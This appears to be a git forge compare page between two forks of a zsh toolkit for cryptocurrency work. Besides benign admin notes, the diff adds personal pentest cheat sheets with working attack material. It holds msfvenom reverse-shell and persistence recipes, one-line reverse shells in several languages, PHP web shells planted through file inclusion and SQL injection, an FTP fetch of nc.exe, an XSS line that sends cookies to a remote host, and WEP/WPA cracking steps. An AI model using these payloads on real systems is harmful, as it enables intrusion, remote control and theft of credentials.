G6_Networks
/
gen6zsh
forked from six/CryptoZSH
4
0
Fork 0
Code Pull Requests Activity

Compare commits

base: G6_Networks:master
Branches Tags
G6_Networks:master
six:master
..
compare: six:master
Branches Tags
six:master
G6_Networks:master

No commits in common. "master" and "master" have entirely different histories.
master ... master

32 changed files with 773 additions and 95 deletions
Show Stats Expand all files Collapse all files

17
README.md
View File

@ -1,4 +1,4 @@
gen6zsh CryptoZsh
==== ====
The aim of this project is to create a zsh environment for users who work with: cryptocurrencies, blockchain projects and crytpography itself. The aim of this project is to create a zsh environment for users who work with: cryptocurrencies, blockchain projects and crytpography itself.
@ -6,7 +6,6 @@ The aim of this project is to create a zsh environment for users who work with:
Tools and Functions inside /draft/ Tools and Functions inside /draft/
==== ====
- Check state of Gen6 services
- Random generation rules - Random generation rules
- Network crypto tools - Network crypto tools
- Logical note taking with linking - Logical note taking with linking
@ -22,12 +21,8 @@ Commands calling functions:
Installing Installing
==== ====
cd /tmp/
``` git clone https://git.hsbp.org/Awalcon/CryptoZsh
cd /tmp/ && git clone https://git.hsbp.org/G6_Networks/gen6zsh && cd gen6zsh && mkdir ~/.gen6zsh && cp zsh_files/* ~/.gen6zsh && mv ~/.gen6zsh/zshrc ~/.zshrc && cp -R tools ~/.gen6zsh_tools cp CryptoZsh/zsh_files/.zshrc ~/
``` cp -R CryptoZsh/zsh_files ~/.cryptozsh
cp -R CryptoZsh/tools ~/.cryptozsh_tools
Check dependencies:
```
zsh /tmp/gen6zsh/dependency_check.zsh
```

28
dependency_check.zsh
View File

@ -1,32 +1,16 @@
#!/bin/zsh #!/bin/zsh
# Dependency check for gen6zsh function chkdep {
echo "Checking dependencies..."
chkdep() {
# Web n code
type python3 >/dev/null 2>&1 || { echo >&2 "python is missing."; } type python3 >/dev/null 2>&1 || { echo >&2 "python is missing."; }
type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; } type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
type websocat >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
# G6 Substrate
# SS58 Converter: http://github.com/shamilsan/ss58.org
type subkey >/dev/null 2>&1 || { echo >&2 "subkey is missing."; }
type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; } type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; }
type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; } type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
# General tools
type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; } type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; }
type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; } type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; }
type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; } type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; }
type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; } type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; }
type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; }
#secu
#type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
#type aircrack-ng >/dev/null 2>&1 || { echo >&2 "aircrack is missing."; }
#type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
#type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
} }
chkdep chkdep()

102
tools/bcp.py 100755
View File

@ -0,0 +1,102 @@
#!/usr/bin/python3
import hashlib
import random
import sys
## That part was originally secrets.py --> now bcp is integrated into a single file program
"""Generate cryptographically strong pseudo-random numbers suitable for
managing secrets such as account authentication, tokens, and similar.
See PEP 506 for more information.
https://www.python.org/dev/peps/pep-0506/
Amit nem hasznalok belole azt kivettem!
Eredeti forras: https://raw.githubusercontent.com/python/cpython/3.7/Lib/secrets.py
"""
__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom',
'token_bytes', 'token_hex', 'token_urlsafe',
'compare_digest',
]
import base64
import binascii
import os
from hmac import compare_digest
from random import SystemRandom
_sysrand = SystemRandom()
randbits = _sysrand.getrandbits
choice = _sysrand.choice
DEFAULT_ENTROPY = 64 # number of bytes to return by default
def token_bytes(nbytes=None):
"""Return a random byte string containing *nbytes* bytes.
>>> token_bytes(16) #doctest:+SKIP
b'\\xebr\\x17D*t\\xae\\xd4\\xe3S\\xb6\\xe2\\xebP1\\x8b'"""
if nbytes is None:
nbytes = DEFAULT_ENTROPY
return os.urandom(nbytes)
def token_hex(nbytes=None):
"""Return a random text string, in hexadecimal.
>>> token_hex(16) #doctest:+SKIP
'f9bf78b9a18ce6d46a0cd2b0b86df9da'"""
return binascii.hexlify(token_bytes(nbytes)).decode('ascii')
## End of integrated secrets.py
# Az egyszeruseg kedveert, 1 tomb = 1 sor
blokklanc_file = os.getenv("HOME") + "/.blokklanc.pp"
# Eredet tomb letrehozasa ha nem letezik
if not os.path.exists(blokklanc_file):
# Genezis/eredet tomb letrehozasa randommal, hogy ha ugyan az is ket szoveg, soha ne ugyan az legyen a kimenetel
eredet = "Eredet."
erand = token_hex(64)
etomb_adat = eredet + erand
etomb_hash = hashlib.sha512(etomb_adat.encode('utf-8')).hexdigest()
print("Initializing...")
print("Origin block: " + str(etomb_adat) + '||' + etomb_hash)
# beirni eredetet
ask_for_write = input("Save the first block into " + blokklanc_file + "? [y/n] ")
if ask_for_write != "y":
sys.exit()
f = open(blokklanc_file,'w')
f.write(str(etomb_adat) + etomb_hash)
f.close()
# kiolvassa az utolso sort
def utolso_sor():
blokk_file = open(blokklanc_file,'r')
for sor in blokk_file:
fb_sor = sor
print("Utolsó tömb: " + fb_sor)
return fb_sor
# hozzaad egy uj tombot
def uj_tomb(tomb_adat):
utolso_tomb_hash = utolso_sor()
uj_tomb = hashlib.sha512(utolso_tomb_hash.encode('utf-8')).hexdigest() + '||' + tomb_adat + '||'
uj_tomb_hash = hashlib.sha512(uj_tomb.encode('utf-8')).hexdigest()
fu = open(blokklanc_file,'a')
fu.write('\n' + uj_tomb + uj_tomb_hash)
# ujraszamolja a blokklanc helyesseget
def teljes_lanc_ellenorzes():
pass
teljes_lanc_ellenorzes()
# Kovetkezo letrehozasa
jegyzet = input("What do you want to add to the blockchain? ")
uj_tomb(jegyzet)
#print("Teszt: " + hashlib.sha512("teszt".encode('utf-8')).hexdigest())
# cut -d '|' -f 3 blokklanc.pp | egrep -v "^Eredet."

3
tools/v3das/_n 100755
View File

@ -0,0 +1,3 @@
#compdef n
_arguments "1: :( $(ls ~/.cryptozsh_tools/v3das/ ) )"

6
tools/v3das/coding_python_venv.txt 100755
View File

@ -0,0 +1,6 @@
tl;dr the use of virtual env:
# #! /usr/bin/env python
# . venv/bin/activate

42
tools/v3das/communication_xmpp_mcabber.txt 100755
View File

@ -0,0 +1,42 @@
# mcabber is a great command line client to use for chat (XMPP) with authentication and encrytpion (OTR).
# The following comments and commands will help you to install and use it.
# Register your account
# Go to jit.si for example
# Create directory for mcabber config and OTR
mkdir -p .mcabber/otr
# Copy the sample configuration files
cp /usr/share/doc/mcabber/examples/mcabberrc.example.gz ~/.
# If the files does not exist, the path may be different.
# Like "/usr/share/doc/mcabber/mcabberrc.example"
# Unzip the configuration file and rename it
gunzip mcabberrc.example.gz
mv mcabberrc.example.gz .mcabberrc
# Correct the priviliges if needed
chmod 700 .mcabber/ -R
chmod 700 .mcabberrc
# Edit your configuration with the following settings:
vim .mcabberrc
set jid = testuser@jit.si
set otr = 1
# Start mcabber and login with the account you have registered
mcabber
# Basic commands
/add user@jit.si # Request someone for chat
/event 1 accept # To accept a request
# Using OTR
# It's recommended to add OTR by default policy to your config files
/otr key # Show your fingerprint
/otr fingerprint . "AAAA AAAA AAAA ...." # Trust someon's fingerprint
/otr fingerprint # Show fingerprints you have
/otr start # Start a conversation with OTR

12
tools/v3das/linux_chroot_grub_install.txt 100755
View File

@ -0,0 +1,12 @@
# Start a live image, then reinstall grub.
fdisk -l
mount /dev/sda2 /mnt/
mount -t proc none /mnt/proc
mount -o bind /dev /mnt/dev
mount -t sysfs sys /mnt/sys
chroot /mnt/ /bin/bash
update-grub
/usr/sbin/grub-install --recheck --no-floppy /dev/sda
sync & reboot

21
tools/v3das/linux_iptables_workstation_example.txt 100755
View File

@ -0,0 +1,21 @@
#!/bin/bash
# Example iptables for workstation
IPT=/sbin/iptables
$IPT -F
#Policies
$IPT -P OUTPUT ACCEPT
$IPT -P INPUT DROP
$IPT -P FORWARD DROP
#Allow IN for services
$IPT -A INPUT --in-interface lo -j ACCEPT
#Allow response
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Block ipv6, sorry lazy to set path, its a note :)
ip6tables -P INPUT DROP 2>/dev/null
ip6tables -P FORWARD DROP 2>/dev/null
ip6tables -P OUTPUT DROP 2>/dev/null

23
tools/v3das/linux_luks_pendrive.txt 100755
View File

@ -0,0 +1,23 @@
# CryptSetup for pendrive example
# Creation, make sure no CBC is used anymore!
cryptsetup -c aes -s 256 luksFormat /dev/sdb2
cryptsetup luksDump /dev/sdb2 # To check it!
cryptsetup luksOpen /dev/sde usb1
mkfs.vfat /dev/mapper/usb1 -n "usb1"
# Troubleshoot if needed
dmsetup ls
dmsetup ls
# Change Passphrse
cryptsetup -y luksAddKey ENCRYPTED_PARTITION
cryptsetup luksRemoveKey ENCRYPTED_PARTITION
# Mount and unmount
cryptsetup luksOpen /dev/sdb2 usb1
mount /dev/mapper/usb1 /mnt
umount /mnt/point

64
tools/v3das/linux_zfs_debian7.txt 100755
View File

@ -0,0 +1,64 @@
# How to create ZFS mirroring on Debian 7 / Old notes!
# Information were gathered from the following sites:
# http://zfsonlinux.org/debian.html
# http://www.zfsbuild.com/2010/06/03/howto-create-mirrored-vdev-zpool/
# http://allgood38.io/setting-up-a-basic-linux-zfs-instance.html
# https://help.ubuntu.com/community/encryptedZfs
# http://linux.arantius.com/installing-gentoo-into-a-luks-encrypted-zfs-root
#
# CheatSheet: http://lildude.co.uk/zfs-cheatsheet
# Get ZFS On Linux debian package, install it and add their GPG key to APT
su
wget http://archive.zfsonlinux.org/debian/pool/main/z/zfsonlinux/zfsonlinux_8_all.deb
dpkg -i zfsonlinux_8_all.deb
wget http://zfsonlinux.org/4D5843EA.asc -O - | apt-key add -
# Install ZFS using APT
apt-get update
apt-get install debian-zfs
# Create LUKS encrypted volumes
cryptsetup luksFormat /dev/sdc
cryptsetup luksFormat /dev/sdd
# Open luks encrypted devices - those will be mirrored
cryptsetup luksOpen /dev/sdc luk1
cryptsetup luksOpen /dev/sdd luk2
# Create the mirror pool using the opened luks devices
# WARNING
# THIS DESTROYES YOUR EXISTING POOL IF YOU ALREADY HAVE ONE!
zpool create -m none -O compression=lz4 m_pool mirror luk1 luk2
# -m mountpoint -O
# END OF CREATION
# Done!
# The following part is required for mounting/opening our ZFS mirror.
# Import the pool if it's not already
zpool import m_pool
# Mount it manually
zfs set mountpoint=/mpool m_pool
# Checks
zpool list
zpool iostat
zpool status
--------
# Finally change privileges if needed
chown -R storager:storager /mpool
# Create ZFS filesystem
zfs create tank/testfs
--------
# Destory
zpool destroy m_pool

17
tools/v3das/metasploit_meterpreter_pivoting.txt 100755
View File

@ -0,0 +1,17 @@
# With "autoroute" it is possible to attack through the remote machine.
# Start handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.1
# Add route to which network you want to look into
run autoroute -s 10.2.2.0/24
run autoroute -p
# Scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.2.0/24
set THREADS 50
set ports 20,21,22,25,53,69,80,139,443,445,993,8080

126
tools/v3das/metasploit_msfvenom_cheatsheet.txt 100755
View File

@ -0,0 +1,126 @@
C0nn3ctz msfvenom payload backdoor veil
List payloads
msfvenom -l
# The script way to make life more simple
theip=0.0.0.0
theport=443
Binaries and libs
=================
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED
msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho
Web Payloads
============
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war
JavaScript
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le
Scripting Payloads
==================
Python
msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux
msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows
Shellcode
=========
For all shellcode see msfvenom help-formats for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c
msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Handler
=======
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD cmd/windows/powershell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler msfconsole -L -r
Persistence
===========
meterpreter > run persistence
UUID Payload
============
# Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat
# Setup msf listener
set payload linux/x86/meterpreter/reverse_tcp_uuid
set payloadUUIDName HAXHAXHAXHAX
set PayloadUUIDTracking true
run -j 
# Move to vict
cat hipchat.elf |ncat --ssl -lvp 53
nc --ssl domainzz.com 53 > /sbin/lister
chmod +x /sbin/lister
# crontab alternatively:
if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi

16
tools/v3das/network_iptables.txt 100755
View File

@ -0,0 +1,16 @@
#!/bin/bash
# Desktop example -> just like in the LWHP repo
IPT=/sbin/iptables
$IPT -F
#Policies
$IPT -P OUTPUT ACCEPT
$IPT -P INPUT DROP
$IPT -P FORWARD DROP
#Allow IN for services
$IPT -A INPUT --in-interface lo -j ACCEPT
#Allow response
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

7
tools/v3das/network_sniffing_tcpdump_examples.txt 100755
View File

@ -0,0 +1,7 @@
tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie
tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:"
tcpdump -r file.cap -s 1024 -l -A dst domain.com
tcpdump -A # show raw data

11
tools/v3das/network_sniffing_tshark_examples.txt 100755
View File

@ -0,0 +1,11 @@
# tshark follow stream
tshark -r <capture file> -R "<filter>" -T fields -e tcp.stream
tshark -q -r http.pcapng -z follow,tcp,ascii,1
# etc
tshark grep from http
tshark -r file.cap 'http' | egrep -i "login|pass"
tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R'http.request.method == "GET" || http.request.method == "HEAD"'

37
tools/v3das/network_sniffing_wireshark.txt 100755
View File

@ -0,0 +1,37 @@
C0nn3ctz sniffing wireshark network
IP address
ip.addr == 192.168.1.1
ip.src == 192.168.1.1
ip.dst == 192.168.1.1
Show only tcp port 110
tcp.port eq 110
Show only tcp and udp port 110
tcp.port eq 110 || udp.port eq 110
Follow TCP stream
tcp.stream eq 0
Show only TCP
tcp
Show only ARP
arp
Show only HTTP
http
Show only HTTP or ARP
http||arp
HTTP and ip.src
http&&ip.src==192.168.1.4
HTTP POST
http:.request.method == "POST"
etc
(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4)

7
tools/v3das/network_switch_cisco_reset.txt 100755
View File

@ -0,0 +1,7 @@
# reset a cisco switch
flash_init
dir flash:
rename flash:config.text flash:config.backup
boot

75
tools/v3das/network_wireless_cracking_aircrack.txt 100755
View File

@ -0,0 +1,75 @@
# cracking WEP with clients
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
aircrack-ng -0 $CAP_FILE
# cracking WEP via a client
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack
aircrack-ng -0 -z -n 64 $CAP_FILE
# clientless WEP cracking
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA
aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA
packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA
aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet
aircrack-ng -0 $CAP_FILE
# bypassing WEP SKA
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file
aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
aircrack-ng -0 -z -n 64 $CAP_FILE
# cracking WPA PSK
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE
# cracking WPA with John The Ripper
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
# change to password folder
vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"
./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE
# cracking WPA with coWPAtty
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID
genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack
cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack
# cracking WPA with pyrit
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
pyrit list_cores
pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough
pyrit -i $WORDLIST import_password # Import the wordlist to the database
pyrit -e $AP_ESSID create_essid # Add ESSID to the database
pyrit batch
pyrit -r $CAPTURE_FILE attack_db

32
tools/v3das/shell_cheatsheet.txt 100755
View File

@ -0,0 +1,32 @@
Shell cheatsheet
================
Bash
bash -i >& /dev/tcp/HOST/PORT 0>&1?
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc
nc -e /bin/sh 10.0.0.1 1234
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
More info and tips
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122387
http://unix.stackexchange.com/questions/116010/meaning-of-bash-i-dev-tcp-host-port-01

41
tools/v3das/web_file_inclusion.txt 100755
View File

@ -0,0 +1,41 @@
Local File Inclusion
====================
The %00 make php 5.3 and below ignore everything after that.
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
...then let's add code to the access log :)
~# nc 192.168.1.1 80
<?php echo shell_exec($_GET['cmd']);?>
...and use it
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or php shell on linux:)
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
...finally send the requests to nc and exploit:
# Windows FTP upload
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
nc.exe -e cmd.exe 192.168.1.1  31337
- - - - - - - -
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo bin >> ftp.txt'); ?>
<? system('echo GET nc.exe >> ftp.txt'); ?>
<? system('echo bye >> ftp.txt'); ?>
<? system('ftp -s:ftp.txt'); ?>
<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
<?php phpinfo()?>
<? system("cat /etc/passwd"); ?>
<?php echo shell_exec($_GET["cmd"]);?>
<?php include="124.1.1.1" ?>
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
Note: the login.txt contains

14
tools/v3das/web_fuzz_strings.txt 100755
View File

@ -0,0 +1,14 @@
XSS locator
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
XSS locator 2
'';!--"<XSS>=&{()}
<img src="//" onerror=alert(document.cookie);>
Other fuzzing char list
><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{}

11
tools/v3das/web_injection_php.txt 100755
View File

@ -0,0 +1,11 @@
PHP command injection
=====================
There are just some ideas.
<? system('apt-get install netcat -y'); ?>
<? system('netcat 14.5.1.44 8080'); ?>
<? system('wget http://14.5.1.44:8080/'); ?>
<? system('init 6'); ?>

43
tools/v3das/web_injection_sqli.txt 100755
View File

@ -0,0 +1,43 @@
SQLi notes
==========
Login bypass
any' or 1=1 limit 1 ;#
' OR '1' = '1 / ' OR '1' = '1
;# ;-- #
?id=737 order by 6 --> Testing max columns
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
More examples
x%') #
x%') or 1=1 #
x%') order by 4 #
x%') union select all 4 #
x%') union select all 1,2,3@@version #
x%') and 1=1 #
x%') and UNION ALL SELECT LOAD_FILE(/etc/passwd) #
x%') and drop table if exists customers #
x%') and create database test #
x%') ; DROP ALL TABLES; #
@@hostname
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
Adding backdor.php
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Getting a shell with php execute
192.168.3.1/comment.php?id=737 union select all 1,2,3,4,"<? system('echo open 192.168.1.9 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'

3
tools/v3das/web_xss_cookie_stealing.txt 100755
View File

@ -0,0 +1,3 @@
<script>new Image().src="http://192.168.1.1/bogus.php?output="+document.cookie;</script>

0
zsh_files/.zsh 100755
View File

3
zsh_files/.zshrc 100755
View File

@ -0,0 +1,3 @@
source ~/.cryptozsh/general.zsh
source ~/.cryptozsh/crypto.zsh
source ~/.cryptozsh/vedas.zsh

15
zsh_files/crypto.zsh
View File

@ -1,5 +1,3 @@
# If needed, run locally: https://github.com/gchq/CyberChef
# Create a temporary file random name and open it with vi # Create a temporary file random name and open it with vi
function tmp { function tmp {
curran=$RANDOM$RANDOM curran=$RANDOM$RANDOM
@ -7,12 +5,25 @@ function tmp {
vi /tmp/$curran vi /tmp/$curran
} }
# HTTP and HTTPS response check
function chkhttpz {
# http response checks from a given host / port
echo "HTTP responses"
wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
echo "\nHTTPS responses"
wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
}
# Show certificate of website # Show certificate of website
function chkcrt { function chkcrt {
# check ssl certificate of a server # check ssl certificate of a server
openssl s_client -showcerts -connect $1:$2 openssl s_client -showcerts -connect $1:$2
} }
# Quickly get random characters # Quickly get random characters
function rnd { function rnd {
# get some random characters # get some random characters

47
zsh_files/gen6.zsh
View File

@ -1,47 +0,0 @@
# Create a temporary file random name and open it with vi
function tmp {
curran=$RANDOM$RANDOM
echo "Temporary file name: /tmp/$curran"
vi /tmp/$curran
}
# HTTP and HTTPS response check
function chkhttpz {
# http response checks from a given host / port
echo "HTTP responses"
wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
echo "\nHTTPS responses"
wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
}
# HTTP and HTTPS response check
function chkgen6 {
echo "\nHTTPS responses for Gen6 App"
wget --spider -S "https://gen6.app/" 2>&1 | grep "HTTP/"
echo "HTTP responses Gen6 LinkFree"
